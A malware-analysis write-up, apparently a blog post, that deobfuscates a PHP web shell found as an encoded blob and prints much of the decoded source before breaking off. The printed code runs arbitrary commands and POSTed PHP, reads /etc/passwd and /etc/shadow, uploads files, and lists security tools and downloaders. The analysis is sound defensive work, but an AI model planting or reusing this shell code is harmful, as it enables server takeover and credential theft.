t27YvhJsVCYl6TdkgyFnMOBXXR1vllgcJMgQHGkUBwBUyifD5ZwgFEcyH7CA4i0m3Z72hamLHgGBVFHD4kr0gRoID1USdGYbhEffeqSUbtK1AdLIK4tGhrsgrCvfuKDmpYR8GUXZxoWKkbAMiptdLGsdFG3oSDweFw4ZIvh6BlXPGnEQxAVgjSNTOMccKAWzP9siWbPj8q5424A9tGBU8ZbQDCuR7IcdUntMWpdXvb92DJmNs4hXQGjR9nOmdEOLgD2w6jXUulUmdoV13HFl%2FZ8YMA8Nw2N2CY11AQjxdNhspgsTi%2Fmgxx6hndH%2BAqWJ4Qwo8zvGkdL33djMKaqOmMobmltKDkqQPxkPXieDiSnW1nx29gRbL4Opj%2Bd4Oaj0qDKl18qYlnc62HWlaTMZtJC45jLwQzYiaCIOO4DTx9anpPCpYEnOGEIRu%2FHTqmttyloEWValX9%2FHKlbaQw6d75Yml4hJgHPshSE8CJPywQtdPv15%2F2PksMUI0TahN73fceJgcMXXIFvxCpOi8iQjyF9bo3shxGUYG6hk80IwWluI6u5PJ2e48YY8vEMtHpibziAqDRgOUlwFbaNpu4DBRpkLiYz3RqQQTd0wBAk85PSSodMP8gK9GZTFyzjr41Vip%2FXxzzFz%2BsjneLnm7u%2BOQJqLfaJdJ0qRtIuyLALNoyBmdNfFHzI0EOLBUHQ4JpluI%2FxxXI4madJHxAdt7PsBg2uIDjTw13ICbTeSrhj36NcB4s5X%2F6bH9rtxYwPE%2B2ZXIbSA1cUPNMcKS9sffLgBQYvqYTBg1w0x3w%2BnkznfLb1bz5rZ%2Fwz3zrjsx1oAH2IzeI2GI20Tjo%2FfJqfiH%2BO4D8f250HOfzRbp20p5%2F3z7R6VjRTbwKcqh0PQ0csF8lijn1WTJKtDjpdC4ZxcXQNvAIWsQwnafSfOBsn53tiFuZznk1m05pV8tdalD6Cfj5KZok4P4QoBo2uBK2DIHHqDnMTlnrz6upq8%2FM25nTIBsPpNAF%2BBaLbbkpWwG5b0vaNFmWxrmnygAJefgN8n97YqBZtLLsyNjEb8CqDOZnjnIwba4qJwbkqY%2FbJYYGf1ctfPmwtisl8MssGv9gQAvPP9PUHQSMXmXL6FpWNhaiU0K7l0hXejNtII58uFtBHc1OVIkZbxpLS4uAUtWd1K3O9B1QpZTT3%2FPDt6fHR%2Fttf9w8NR7J6Ep7ZvISXXKJMy%2FhitJW3xQ%2BxC0aTPdEiIcEDe8d%2BABRgpfAD%2B3txOjywCJhbzOmhwqotPbMBIXbIIW5HtqQ2i9yaRFI3%2FOmGN91wpxvZRgJ3psacNRZJ1s2djrA5Is%2BBf9bN2ZpuTvVRQL5n9As7Rcxh679jermde%2FKV2PHb2xrO%2F2azZaNwJOn4nLqp%2BlvZgD%2Bt1PVUKc%2BsW38r63rVuq4q5Zp1629lXbdaVw3RHHz1naxXHWoiiyRGteo7WS2pktp1%2BFFbfqbCWwBPi6Hhq6FAO0f7x6%2Ff%2Fnp6%2FGofhHH%2FhgB00pjGUFuRc6pZ65GM%2BEP2tqJPsZS393pT%2BvT1vXo39Ordodebgu2t79W9oVe3qdcVdvtRsxExNCBLmq2oRpI7VE8au7%2BDATNUrvSqrNBllFcMJonUhKHIMhlPftmY8cFsOdnrXw8Ho6QQJ%2B%2Bk%2BMJnUyzm%2B%2F4q3%2FXFG27h10au7Isrv%2FIQ%2Fm0oMOOXk%2FM%2BJIcYJKMtCc6awgyYwP74bDBMNsEX8su5Wc36PHUc3yIe0PoyHT8HS6yF%2FMhmgofgmVHb%2BjJMj7HId7IIhACgqCjWF0wrRa%2FtK%2F7KkhNjb%2Bi5shbT2OrDDFnsK4J6%2F8tKbIA1cQSKopBvWdkliXUbKn7ABnLNJWiO30df7HOD1bW%2ByNgsapQTIS1Z%2FavJsICJLaO8QChC6U%2BH%2FPMKoJZYKjWRDHKUi9fjJXLQyQxUo3LOaL0SXVDw8itl1NdGhEFQYCE3S9AsBZuYBPKQ2BKs%2BsqqMM9rSETPknGSz%2Fg7sR6BSwuCbX6eerrd1QWSMOjBn2s0yYfiBU31FW4A6wtY7Mvvi3EC6VRGg3uWbpNAEuPecM83jLLN4JZrb32BkKtbaN0vq7gc%2FlW4IaQdibBDwRMLEeSyXFE56o0kH2TLlwYyil2xkS8wHi1tp2qbzftUlZbBZOWfiwGGQgb1W0MMAZRgsZDMzLHqvCFK7Cj6x4AybQOG2Dtyla0qf79zORCs66ZgXc%2BtRIiAUkrbhYpGYCMfLulJ0UAaBodnkLcl7xWgzyUdhVQHIMNXUXH0Y7%2Frwz1o2tWZLB88%2BBMVQz24sKeHvLDwszjFmKSooULBnL6kSeTkYPCRw%2FWJ09U5s6nPpTihMbcKpjuNijAsbYaSLqQPhZu7NEn2UA2CNspkICs1KWQKCwao2%2F3q6xVT1kajZFLuyFqo4Do5MRqq3WbKcphf8y9bWkUKOWhWua3QoQg%2F2fNJzXOrTzohFieZct3T3og8wWSCpPe6SWvG%2BayoqMzgBVwPoiqEkfZGqW1oBbTaBvRgD60%2Ftc4m8lK4TfJDR8ODKwOKlulnDlc8qM5hpPiVJXZbYb8a8xd1BmYYG5hEWl5QzIE3M9Djxhgzfi3GDBBETYE8I9xMNYSMjS2vhs6hUFtk3Hz49OnjU8H6%2FGIKYwRR%2BnAXiND2w%2F6b5xam79zDF9AA1W5hbarV0rUfNVQXJGfGj8rq2pfVCE6D1gKVPYa202rf87PkzUp8GoHZMpBUJZpS7T%2BA2ySOQ5xhGf0Jw2XtAn2e7SBxtNwy6o8tDdAlVOWuQeBxk0FkTbm1yCa%2F%2FI%2B6aMDom5XoJDftuu8MN4cG5qzuY6QMWA2Vn4Sv8y9sAPJT%2F1BRGW8bu6EtXW4wLzuWN75VbfShJ7WW4vsBLaNRiZpfraUQpdPg01RpdDRYcEhcRA3T%2FKog5jTFGFRcznA1%2FPTaCbR34RwTKJZuPzw4eA3%2BAGMB%2FtkOHZrw8SH5xVC5V693c1CimV%2FRmwwCNfAiqTiZVsAXBSxR4MicGMjaMBdoj1pdtTD4Sd4zQAs083ifYDaIoSVkY1SHrjjMKssSHcv93HE819pwrI2OoVNWBghUHJC%2BguCyU%2BNmoI%2F4%2FpRW70drLbkWLfTzqz0o18%2FzZ%2FgUi4JPAfBb%2FAPgeCs3vlsLq3VHggdrr2KWS8ImXQvwPGSkKFf69FlNn87nidjwkMYy6joYrj7Sevp%2BN8zB0JNOG0bHrCThcK3MD4shP6JrBfw9s%2FAF3C306QqCUavS5EFMn7nhfqz8qt3f0O0PS4SQorgBukKARFTADdBDmvwhoNKKN83h0ixz4vyJcUQC75EEIeScCyI%2FVbGz8oz3IFE2XhOxtEh6pVXEpzIHMvkAGMSq4TJI5dypXRGZMc%2FFDMKYEAx1sXNyl8ggK9cXdLnCiDOipsKwW%2BhUlch3MbpJKy%2FKfUR%2FteYG6uO2kXcrhtuL6FSf5IZdSCda2w628bP1eTkevLTXtmRa8KgbnQ1bVlK6AQwpgYwFI96mYmFjurR03RyMzeimSmH6xWxyteCv6GJc%2F9iweSYYLb5Yzp7IO3Pj94aNfkVie80WR%2FQZZVdLvdmwga6S8y38sWEP%2Fy0L4h%2BieYqDJNtWPzZKD2Zqlf7cgHQQzzMum4Af1hb81A6esJUIXxmx1Gp4lMkMsmVgQjH461D%2FZeb%2BsnUkqtLLXl06wpU67C9GXL3indOkC541Nsai%2BWQpD7OL0tmucqbLEweKXMpjfJ2XoDiu6PjtjNQSbluCzhnnbauMYoPsNXGBOpQdWfSPKt5PKBcwHhbK7UOKJMZ%2BIYsDRnINlSHBUnuY0t5nxNFKY1LcUX0iJYwIi5Jl0EQfL2AZoV8zy43xx40cptLKjWBlRBC0LYUZdMAwCk5cIGgBz4yE55CeeDwAIRkCmuMtGmwrdRirpKdpHIHBTFz61cIteNADQYt7RvQwNI%2B1VeoFtZBGogXIh6DjHeqQz4qHudQZBc2Y56T5u7xvbmm4fMcj1eobkRDxBCzDKV4qw3rxx2iA8eEvdWztsXiXzJI3Yp%2FUpyqKIzBbTruxpyVB1nr569HRLy00f6F4ayipGSlQ5%2Bty2%2BeOB7F%2FnG6hLWRroSHC3AVnLqdXJpO3VfodGaIv7RbguYxNaZg6qGLEXDSnKD1QmDpMCAoCfRuSPF6vQt1YYQ30PR9dxniRJolxCGDG8iVgCjTAxTaaQrQ68T%2Ft%2FgUR4LGIhZ8fW2hOJmhzdeIRotXG1oET%2B5D2nKBSk1k62lMWhjQAUhcGnqNtANC8C9NuwQUjpDo8Ox2MB%2BBWCMZ4aKAqvryuQwcWOuBXn2Xd8KCceT7MktnrtegwyCZr4C%2BSLIUAhbie2rI9ySACThxnOmohzAmStiyxFnxcesaJWYU9u%2BBHlIAre7wCstsFw1JGrZbjh1TD9aZkE8D8vl1ph%2BBh1JzRzqXZBPHg76yj1alzXcy6Qo%2Ba5ZE4jJEz68WR0bZk6LfhfnfbxpDaoHwitJCxG2SZpg67nt8VOy2PgqAMjSF4qfEWX87ng%2B1swde1ijYNgrwMnq5iAMLIoiTjmkDbkzHw8Wgs8gn8jj%2BigUiO2Z1bJ2ANgL3Rn6Wf8VreTAjA1y3wlbapDQkrMONwsw0GdAJK45slPx2uwOvH6MBIk3EzvOJwT87n%2FwxeaqMZXuPbenhpYhlhhNoSQcwB93rdqKuNwemckIG5ikQw65DEIcrX0QGqzCLuq2ws%2FaSIelA7jMFBkDtmRiuxG%2BaT85uQBAo8W4G%2FSOIMXP0Ct0TlOihB4kCsTXqoDmWM2RrRHC6Lxt0YOF2wVaKH1KbmLqbODdMe2CnilOkJDAoXHJS9rvKW7IdZGD%2BG1A4u2GL1nLhXsQyToMYBhv9Kut1U2%2FhV7gjXGRr6mYO55rF5TSkpbGgHi2Aq9vFg8iewZJpswidpHIp9MgJddq0mad44KdznEPOUulZ9gk9hYVoVlxekoHisDEaFJ%2BlFHpilJqHOhPbgQSW5Wp9mklFJacGf%2B3xf4BnOpMCzXAfjpS9SjMJGxcIl%2BhVB2KcajAahkHzbwHKqw2hJGgfUzgYzPlqOIYHKSv63lW%2FGRGysyxTHeQSuaIRUCpsEL5QfwNxKM8bKsafSNA%2FO3%2BOyKFW1tk8klF6a7DZtXFaEefT4lg0xA73iKlkuOOakIkKgNROCiR2MNqdXaEItkBSlq9kShZy5Mq3%2BPL7GJybclQWvDMlmxlX0FjTvzSA%2FInUnVRqei%2F4fWQEbycvy8LZNXTa5OhCiT4z6UQNJ%2FhwPxiTyZfOREDxxIMPB6CqZowQpXqcjvAC4mCej%2BfVcDii5OpuQ%2FTgElZB%2F54PP%2BP0MAMoW8OcoT%2BY5TUcmFn%2BC0zCbjLHc9UyQvzkIBvg9y4d8cI5f%2BGxwBelx4O%2BrYjqwic1LkwX9vRhcLCaT2cU5zjjc5C7PL2YIw0hIAPhHyq9mOfx1SWOBIV4u8ZNAjixP4U%2FPzydjKnRRLg3iAiYSjxNwkSPaqyn4%2BaZV5CZ3gncV1tOnq1Q78LMuImBsxALy4qRb%2FG00N%2FHGQHVBdsFJlB5rzgfaB4z2nqIEMoaYkW2iIZXh6t2DAyo%2FGY4YDahuCcc%2FwaT0tYT3jmzBvUsLo8nsQLdhn1RzJ8jbAwLFzNDgGm9aYcu8S7BPykQJlCBBRuwnqa9j8kEtYCqEqFM9lqQ61CSmdNozWvgmaksbmRFqqY04nPGpaJqQf5FktKEyRE1vOvgLkdV4IsXBaBFiG6VLRP3x5HxxPSVShAHL7Ok5PvgFJBsUeE%2BNZvRf%2BeOsRHtFQMHx2YWE20R6FNoKYZ3v%2F220lXvKDGuArAyjvtSx06ill8cncdyMOE9Vwf4MFGzNHaTr%2BRhRC0W1KpMqqIBY7DHH0EGK3T9FIr6SJg5p1nS6nFsvD99mK5s8DHCTU2cNXGSUhsCyUDFTUjzl%2BVKwvIPTcswrIiOVsPTVxGrvPupNSGTVre8fPn5%2FfPD6SF7q2e3LMUevByCuyRUYo8q7vFVuB5UtjKC%2B5cABiTaBW6Cc0xStNkcyLSMwK6MHc%2Bcbhg6fbxo3Ct6MNESlwsOIYUiaDkaaFrUuayJuos0K2vgMrOvFAAJdqAkyA3CSeoWRuK4QCoxeKFblDVny8Abqpu8b%2BusBpOe1ciqyepKTkoSRjG9qjvjsTIgOb9bqC85W3Vik6g2VUIwURFrFJ%2FW9qwmkXd4FhaDjc0NzhUYZ22RNv%2F2wFqeSUoaXObktC6675MlzczJuGQmcYoLDe1sZcqlo3zpr0sOv2N9gdiV40ftf9K2e9leU11c6sff%2FSpxR1Zfh0KhOvbVeFVUIG3Nj3BqNVMcjfXzneKSqCuxotMHfXoizc7AYLkf2zv6b3473Xu1b9gIdKEynDJUxvVzgOy2tXRtFefLfsMZ6VWWmYDqBW83sQCWBsbrhaJ%2B1Vg5%2BcwCKRfnm8RTfMIwbUFUc17%2BsGxY6UF6MbMncFOb4jDhztw3x7mPK%2F%2FGY8BS7YUgykQ2NRHoeyxHpi6j%2FXyxZjZ7ww5tH9D%2B%2FNn87ePE3DRfXD71i5Hjt2nBbJy2VWdzYb6DRu3nFFLWpW0FV0g%2BuN5FSPlzWHY0PlHEvZMxeMURASPDMgr9U1qGWNCjpKMS2FpNX7bpxidVCnadRVPC8s%2FdtQXrBSsWulf1xdcmMfQO2BcYukndtJVNTHsPkrcxyP%2FP0ZU2%2Fl7ug5ezmXa7vESCPEaidnCjTIaVQFbdYTjBuuQO%2B0lRIsjRgOQShQqZwzeG7T4CFhodUTCSRYGT7qR9CyIqoKIzLPvqmlUiioWLCC%2BmWHRQZAEIPbVApuP8%2BwcaoSQKCvlCpIPJCtIbwQq28EOyfC%2FFp2qAJLkDXR%2BMheBgNSwPSac1a1sZ4QBGxpjK8DM9my8kcFckVR3Uoh9wphvNTU4XMVPm6kZnSNw%2Bx03uKFi290ve4luOJ4C14AZofwePG5V1TmTUsTDyMToOl5GcAj0K6PUKxDIKvUTk9Xpu%2B3whj7HdDVBe7pW4Lml7Ozhcg%2BYrG8zCC7ML0WAWuKCDlNKOGbhwldcKoQgml6uomOFkHm8AsaajXfaRaVV%2FUcj0ql2gNp%2Bu6HgSCo4dx%2F05A8iiDyM20iegrflCJImhbMSqmBgGdK1WQGe4HZyYJe3k5M2UOszKjt5CPAh%2FuvTGJd2NJdBF3IM4EpRmXcJdmGjvUcWIkJA%2FyIoCb%2BNzNjIvzatRRdEk1jWUSIza4SrzWsZsktN0dqwXv4bXYV69ePz8SguapDpreUgK1yjtgmtFVCojfrYqZG7UNv1paM5Hcr4f%2FkHFCgDzuHa5m8sp9L4G4MkGkk91WDU12rJrBFFAOTPXOIEm9YYGQcqB%2F9GgUM%2F20CzdhvBt3D4ypVh7DFKxmxR4B%2FF3JEE2cEqk1T84toCpHEEmVIth0Tk8xTMqpDLJ674et%2BclJ5%2BQEPH7bJyf3bJ0mHqOjy6g4OljfnF9LxYgZNQVvQCIOgYsI8IolAGbd4r%2Bh4QzUP6na3q5GJxaMwo9EJPn5wpIjmggWZZxcWdfDIbBJ69KO5oNssKyI13GAKeDpoc0AKmYM5cjuNYyMFoHRALUkW1oArmBK7iZwR1ckoTKl%2Bf%2F%2BLw%3D%3Dy26A7s4S4pPwIzqzQraQiYbVmEL1d92nACqlN1R55u71JisoY0Sxj7Gcq8zsd54nbDjza3J5EmHIi7LWKo4Ip2VvpnqcjKANeYbKtwSRUPMJP31ypzNmZMQVS8O0E0ZEW0clBfDa9nM9jhDNhKmUHHJBkzpt3ijC07mQhpVnGvSm1T5JScWslhtHaph5ntHGHzCTjOS3uMKPMN6xz5owVfaqivWujhe729awrV28QdpaErkOHyRkkZhC8Dq4ycZ7rVcYB8sHnNo40pn3gIyReXO0GiPxuMhHsgoV59CZs07z0c1KnfubeRHyG2uXwDAxmG7AvwAm9o510ZFwWwYbNI9WPVyCKBrlPjeRf4sPuA2uUUOGdTfNMUrRDPzZnsrVfQzHvCX1ZXfFK3YqX56eyyRFp6puwyqL3TchL1p2jnBkpcAUMZfY%27%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%3B'));
I can immedately see it is URL encoded. There are also some evals, custom functions, and functions such as hex2bin.
UnPHP
The first thing I did was put it through an UnPHP. This prettified it and sorted the URL encoding. Note I’ve cropped the almost 40,000 characters at the end.
<?php function _fqGh($_L6rsScKju) {
$_L6rsScKju = substr($_L6rsScKju, (int)(hex2bin('31303039')));
$_L6rsScKju = substr($_L6rsScKju, (int)(hex2bin('30')), (int)(hex2bin('2d343336')));
return $_L6rsScKju;
}
function _RYp9tOnbVX1pHywKYLgJN($_Y8EdzJhF) {
global $_L9RBbeL;
global $_K4lXsj5bZ;
return strrev(gzinflate($_K4lXsj5bZ(_fqGh($_Y8EdzJhF))));
}
function _fqGh($_L6rsScKju) {
$_L6rsScKju = substr($_L6rsScKju, (int)(hex2bin('31303039')));
$_L6rsScKju = substr($_L6rsScKju, (int)(hex2bin('30')), (int)(hex2bin('2d343336')));
return $_L6rsScKju;
}
$_L9RBbeL = '_fqGh';
$_K4lXsj5bZ = 'base64_decode';
function _RYp9tOnbVX1pHywKYLgJN($_Y8EdzJhF) {
global $_L9RBbeL;
global $_K4lXsj5bZ;
return strrev(gzinflate($_K4lXsj5bZ(_fqGh($_Y8EdzJhF))));
}
eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_RYp9tOnbVX1pHywKYLgJN('8od8tCYx5jtbQzoW0[...]'))))))))))))))))));
Manual Editing
This is much better. We can immediately remove the duplicate functions, replace the hex2bin with the correct integer values, and delete the duplicate evals before the final long string.
<?php
function _fqGh($_L6rsScKju) {
$_L6rsScKju = substr($_L6rsScKju,1009);
$_L6rsScKju = substr($_L6rsScKju,0,-436);
return $_L6rsScKju;
}
$_L9RBbeL = '_fqGh';
$_K4lXsj5bZ = 'base64_decode';
function _RYp9tOnbVX1pHywKYLgJN($_Y8EdzJhF) {
global $_L9RBbeL;
global $_K4lXsj5bZ;
return strrev(gzinflate($_K4lXsj5bZ(_fqGh($_Y8EdzJhF))));
}
eval(_RYp9tOnbVX1pHywKYLgJN('8od8tCYx5jtbQzoW0[...]'));
We can see the long string is passed into the _R function, which involves string reversing, string deflating, base64 decoding, and the _f function, which does string manipulation using substrings.
Run the Function
Now, I could try and figure this out manually, but… I have a better idea. We know everything outside of what’s passed into the _R function is safe - it’s just manipulation/obfuscation. The best way to check the output of the functions is simply to run them!
<?php
function _fqGh($_L6rsScKju) {
$_L6rsScKju = substr($_L6rsScKju,1009);
$_L6rsScKju = substr($_L6rsScKju,0,-436);
return $_L6rsScKju;
}
$_L9RBbeL = '_fqGh';
$_K4lXsj5bZ = 'base64_decode';
function _RYp9tOnbVX1pHywKYLgJN($_Y8EdzJhF) {
global $_L9RBbeL;
global $_K4lXsj5bZ;
return strrev(gzinflate($_K4lXsj5bZ(_fqGh($_Y8EdzJhF))));
}
$code = _RYp9tOnbVX1pHywKYLgJN('8od8tCYx5jtbQzoW0[...]');
echo $code;
Let’s use a PHP sandbox to run the code, and echo the output of the function. I used Online PHP Functions, linked at the beginning of this article.
<?php
goto ea5af; b9a1d: function actionSelfRemove() { goto bfe6a; F797e: if ($_POST['p1'] != 'yes') { FkLptHeader(); } goto e0949; e0949: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto b47b3; bfe6a: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto F797e; b47b3: FkLptFooter(); goto B1eb3; B1eb3: } goto fdce9; ea746: $default_charset = 'Windows-1251'; goto F64c6; a23df: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "FkLpt_version" => FkLpt_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto ec1d4; E4fd4: $default_action = 'FilesMan'; goto af6f9; B605a: $cwd = @getcwd(); goto C0eb9; D34cc: $home_cwd = @getcwd(); goto cd85a; cd19b: function FkLptEx($in) { goto Cec6e; Fe7d7: return $out; goto Fe1d8; Cec6e: $out = ''; goto Ae211; Ae211: if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { goto cd1ff; c21a4: $out = ob_get_clean(); goto c5739; cd1ff: ob_start(); goto fc65d; fc65d: @passthru($in); goto c21a4; c5739: } elseif (function_exists('system')) { goto Fc2a5; C9afe: @system($in); goto F1fef; Fc2a5: ob_start(); goto C9afe; F1fef: $out = ob_get_clean(); goto D809e; D809e: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto ff091; D0ff6: $out .= fread($f, 1024); goto F5264; F5264: goto Eac36; goto Ed53b; C3c60: Eac36: goto f2cf4; f2cf4: if (@feof($f)) { goto d76a7; } goto D0ff6; Ed53b: d76a7: goto B13b2; B13b2: pclose($f); goto f23f6; ff091: $out = ""; goto C3c60; f23f6: } goto Fe7d7; Fe1d8: } goto D2c3d; A7ba2: function FkLptFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t\t<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>"; } goto Ce30b; a7e14: function actionSecInfo() { goto a11d5; C297b: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto fbcaf; aabfe: FkLptSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto E913a; a8f70: echo '<h1>Server security information</h1><div class=content>'; goto A1696; A5d80: FkLptFooter(); goto Bc843; D0245: FkLptSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto Df635; F57cc: FkLptSecParam('Supported databases', implode(', ', $temp)); goto fe5b6; e822e: FkLptSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto Ca398; Df635: FkLptSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto d7c45; fe5b6: echo '<br>'; goto ec321; d7c45: FkLptSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto ab4b2; ec321: if ($GLOBALS['os'] == 'nix') { goto b4b93; f446d: if (!$GLOBALS['safe_mode']) { goto Ea17d; c614f: foreach ($danger as $item) { if (FkLptWhich($item)) { $temp[] = $item; } Eeafe: } goto c8fc3; Ea17d: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto a6a96; c5dc2: echo '<br/>'; goto d7c34; dd60e: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto C26ee; A6d5f: $temp = array(); goto bc5c5; bc5c5: foreach ($downloaders as $item) { if (FkLptWhich($item)) { $temp[] = $item; } f7a92: } goto b995f; d7c34: FkLptSecParam('HDD space', FkLptEx('df -h')); goto Cc9af; a6a96: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto F1c8f; F23e6: FkLptSecParam('Downloaders', implode(', ', $temp)); goto c5dc2; c8fc3: F3127: goto F29ef; F1c8f: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto c2aff; F29ef: FkLptSecParam('Danger', implode(', ', $temp)); goto A6d5f; d6991: foreach ($userful as $item) { if (FkLptWhich($item)) { $temp[] = $item; } Fd297: } goto A8b5b; C26ee: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto f5d49; Eea04: echo '<br/>'; goto f6e3e; dede6: febbc: goto Eea04; ca5ae: goto Ee3d1; goto dede6; E8908: Ee3d1: goto f2681; A0725: $_POST['p2']++; goto ca5ae; f2681: if (!($_POST['p2'] <= $_POST['p3'])) { goto febbc; } goto fe0c3; f6e3e: FkLptSecParam('Users', $temp); goto e1f44; Ab77a: if ($uid) { $temp .= join(':', $uid) . "\n"; } goto c819d; fe0c3: $uid = @posix_getpwuid($_POST['p2']); goto Ab77a; f5d49: $temp = ""; goto E8908; c819d: A95c5: goto A0725; e1f44: } goto a5e94; A8b5b: C51d0: goto e6704; e6704: FkLptSecParam('Userful', implode(', ', $temp)); goto cf0a4; cf0a4: $temp = array(); goto c614f; Cc9af: FkLptSecParam('Hosts', @file_get_contents('/etc/hosts')); goto dd60e; b995f: e86fa: goto F23e6; c7678: $temp = array(); goto d6991; c2aff: echo '<br>'; goto c7678; a5e94: } goto c58ae; Feca6: FkLptSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto D7327; b4b93: FkLptSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto Feca6; c698a: FkLptSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto f446d; D7327: FkLptSecParam('OS version', @file_get_contents('/proc/version')); goto c698a; c58ae: } else { goto b0e11; b0e11: FkLptSecParam('OS Version', FkLptEx('ver')); goto ce271; a5c99: FkLptSecParam('User Accounts', FkLptEx('net user')); goto E5ca0; ce271: FkLptSecParam('Account Settings', FkLptEx('net accounts')); goto a5c99; E5ca0: } goto Cf7b8; fbcaf: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto F57cc; E913a: FkLptSecParam('Open base dir', @ini_get('open_basedir')); goto D0245; ab4b2: $temp = array(); goto C6738; Ca398: if (function_exists('apache_get_modules')) { FkLptSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto aabfe; C6738: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto Da20d; Cf7b8: echo '</div>'; goto A5d80; a11d5: FkLptHeader(); goto a8f70; Da20d: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto C297b; A1696: function FkLptSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto e822e; Bc843: } goto f5d69; Df69b: if (!$safe_mode) { error_reporting(0); } goto D0ce4; E01a8: function FkLptHeader() { goto cde8b; a9f5e: $path = explode("/", $GLOBALS['cwd']); goto Fcd17; B527b: $i++; goto E0dbd; Bd90c: df755: goto eab26; b8afb: global $color; goto D93e5; d247f: $cwd_links = ''; goto a9f5e; e0070: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; f87ab: } goto e3f8d; Be5ea: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto a3739; ab364: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto c8bcc; Fcd17: $n = count($path); goto e28ae; b3053: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto fd387; D27be: goto df755; goto ccdbe; a3a67: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto F754a; cde8b: if (empty($_POST['charset'])) { $_POST['charset'] = 